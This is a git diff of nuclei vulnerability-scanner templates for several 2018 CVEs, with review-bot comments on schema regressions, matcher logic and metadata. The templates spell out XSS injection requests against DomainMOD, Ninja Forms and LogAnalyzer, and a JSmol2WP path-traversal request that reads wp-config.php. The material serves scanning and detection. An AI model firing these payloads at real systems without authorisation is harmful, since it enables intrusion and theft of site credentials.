@@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.46465 - epss-percentile: 0.97094 + epss-score: 0.43128 + epss-percentile: 0.97253 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" - tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport + tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: - method: GET @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009be46c7bb777e641e3a523f0343d176d1e62bf646d5fffd53ff97747d3b969290220470c38d7a29fed9b96df2eb6ac8b678f1ce11b058c3f46b8dbb86d1a8ae5c2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml index 6439455c7b..c689c4e74a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml 
@@ -1,35 +1,22 @@ id: CVE-2018-19137 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. reference: - https://github.com/domainmod/domainmod/issues/79 - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39294 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: domainmod - product: domainmod + verified: "true" tags: cve,cve2018,domainmod,xss,authenticated - -http: +requests: - raw: - | POST / HTTP/1.1 @@ -40,20 +27,17 @@ http: - | GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '&really_del' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
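Review bot: The new side reverts this template to the legacy `requests:` schema and drops `impact`, `remediation`, `epss-score`/`epss-percentile`, `cpe`, `max-request`, the vendor/product metadata and, in the second hunk, the `# digest:` signature trailer, while turning the boolean `verified: true` into the string `"true"`. CVE-2018-19752 and CVE-2018-20470 receive the same downgrade in this commit, yet CVE-2018-19287, CVE-2018-20463 and CVE-2018-20526 are moved in the opposite direction to `http:`, so the commit leaves the repository on two schemas at once. If this is an automated sync, the copies it pulled from appear older than what was already here; keeping the `http:` version with its signed digest seems preferable to discarding the classification data.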
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19287.yaml b/nuclei-templates/CVE-2018/CVE-2018-19287.yaml index 0ed57f548c..e3bf2d980e 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19287.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19287.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7 - https://wordpress.org/plugins/ninja-forms/ - https://www.exploit-db.com/exploits/45880 - https://nvd.nist.gov/vuln/detail/CVE-2018-19287 + - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 + epss-score: 0.37007 + epss-percentile: 0.96816 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress - -requests: + verified: true + max-request: 2 + vendor: ninjaforma + product: ninja_forms + framework: wordpress + tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma + +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -28,13 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=">')" - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml deleted file mode 100644 index 7a50117796..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2018-19751 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. - reference: - - https://www.exploit-db.com/exploits/45947/ - - https://github.com/domainmod/domainmod/issues/83 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19751 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/ssl-fields/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test - - - | - GET /admin/ssl-fields/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml index f5d120debe..4876f6389a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml @@ -1,36 +1,23 @@ id: CVE-2018-19752 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - https://github.com/domainmod/domainmod/issues/84 - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 
@@ -47,23 +34,19 @@ http: - | GET /assets/registrars.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - '">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19753.yaml b/nuclei-templates/CVE-2018/CVE-2018-19753.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19753.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19753.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19877.yaml b/nuclei-templates/CVE-2018/CVE-2018-19877.yaml new file mode 100644 index 0000000000..1a7a7645d2 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19877.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-19877 +info: + name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. + reference: + - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ + - https://www.exploit-db.com/exploits/45958/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19877 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,adiscon,xss +requests: + - method: GET + path: + - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 
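Review bot: The second hunk removes `matchers-condition: and` while keeping three matchers (body word, `text/html` header, status 200); without that key nuclei falls back to `or`, so any 200 text/html page reached after the authenticated flow now satisfies the template, which is a clear false-positive regression. The change from `host-redirects: true` to `redirects: true` also relaxes redirect following from same-host to any host while `cookie-reuse: true` carries the login session along; CVE-2018-19914 and CVE-2018-20011 in this commit use the same `redirects: true` form. Restoring `matchers-condition: and` and `host-redirects: true` keeps the prior behaviour.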
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml b/nuclei-templates/CVE-2018/CVE-2018-19892.yaml deleted file mode 100644 index f310b4f7f4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2018-19892 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. - reference: - - https://www.exploit-db.com/exploits/45959 - - https://github.com/domainmod/domainmod/issues/85 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19892 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/dw/add-server.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - - - | - GET /admin/dw/servers.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml 
@@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml deleted file mode 100644 index 5a975e956b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2018-19915 - -info: - name: DomainMOD <=4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. - reference: - - https://github.com/domainmod/domainmod/issues/87 - - https://www.exploit-db.com/exploits/46376/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19915 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/host.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test - - - | - GET /assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml deleted file mode 100644 index 40298f6945..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2018-20009 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. - reference: - - https://github.com/domainmod/domainmod/issues/88 - - https://www.exploit-db.com/exploits/46372/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20009 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/ssl-provider.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= - - - | - GET /assets/ssl-providers.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml deleted file mode 100644 index 9f5e6c82a0..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2018-20010 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20011.yaml b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2018-20011 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + reference: + - https://www.exploit-db.com/exploits/46374/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20011 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve1028,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/category.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= + - | + GET /assets/categories.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20463.yaml b/nuclei-templates/CVE-2018/CVE-2018-20463.yaml index edd0c33519..dad08f7421 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20463.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20463.yaml 
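Review bot: The tag list carries `cve1028` where every other template in this commit uses `cve2018`, so this template is skipped by a `-tags cve2018` run and the year-tag convention is broken; the line should read `tags: cve,cve2018,domainmod,xss,authenticated`. The file also pairs `redirects: true` with `cookie-reuse: true`, which follows redirects off the target host; the templates deleted in the same commit for this product (e.g. CVE-2018-20010 above) used `host-redirects: true` for the same three-request flow.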
@@ -1,26 +1,38 @@ id: CVE-2018-20463 info: - name: JSmol2WP <= 1.07 - Directory Traversal + name: WordPress JSmol2WP <=1.07 - Local File Inclusion author: vinit989 severity: high description: | - An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF. + WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary. 
reference: - https://wpscan.com/vulnerability/9197 - https://wordpress.org/plugins/jsmol2wp/ + - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 - - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-amp-SSRF + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 + epss-score: 0.01939 + epss-percentile: 0.88381 + cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal + verified: true + max-request: 1 + vendor: jsmol2wp_project + product: jsmol2wp + framework: wordpress + tags: cve,cve2018,wp,wp-plugin,wordpress,jsmol2wp,wpscan,traversal,jsmol2wp_project -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php" @@ -42,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502200faec7da2adad8d90967afee7532000ac3c1277e331cce4dc2cab2e16fbd160e022100a43079a7854c14db04a7ae1f89aabbeb67bd938f5e9b15294eae1181274685c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml index 913e599c3a..15ee6fd76f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml 
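Review bot: The rewritten description claims an attacker can "modify data, and/or execute unauthorized administrative operations", but the `cvss-metrics` line in the same hunk carries `I:N/A:N`, and the mechanism described (`php://filter/resource=` read of `wp-config.php`) is disclosure only; the added wording contradicts the classification and should be trimmed to the file-read and SSRF impact. The new `remediation` line names a fixed version `>=1.08`, yet none of the listed references establish that such a release exists, so that number should be verified before it steers users toward waiting for a patch. The `# digest:` added in the second hunk signs this content, so either correction means re-signing.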
@@ -1,21 +1,19 @@ id: CVE-2018-20470 info: - name: Tyto Sahi pro 7.x/8.x - Local File Inclusion + name: Sahi pro 7.x/8.x - Directory Traversal author: daffainfo severity: high - description: | - Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. + description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 + - https://www.cvedetails.com/cve/CVE-2018-20470 + tags: cve,cve2018,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-20470 cwe-id: CWE-22 - tags: cve,cve2018,lfi requests: - method: GET @@ -24,16 +22,13 @@ requests: matchers-condition: and matchers: - + - type: status + status: + - 200 - type: word - part: body words: - "bit app support" - "fonts" - "extensions" condition: and - - - type: status - status: - - 200 -# Enhanced by mp on 2022/06/17 + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-20526.yaml b/nuclei-templates/CVE-2018/CVE-2018-20526.yaml index 2b79f67c74..0079a9708c 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-20526.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-20526.yaml 
@@ -6,21 +6,33 @@ info: severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary commands on the target system. + remediation: | + Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html - https://www.exploit-db.com/exploits/46085/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20526 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-20526 cwe-id: CWE-434 + epss-score: 0.00666 + epss-percentile: 0.79248 + cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: roxyfileman + product: roxy_fileman google-query: intitle:"Roxy file manager" - verified: "true" - tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb + tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman -requests: +http: - raw: - | POST /php/upload.php HTTP/1.1 
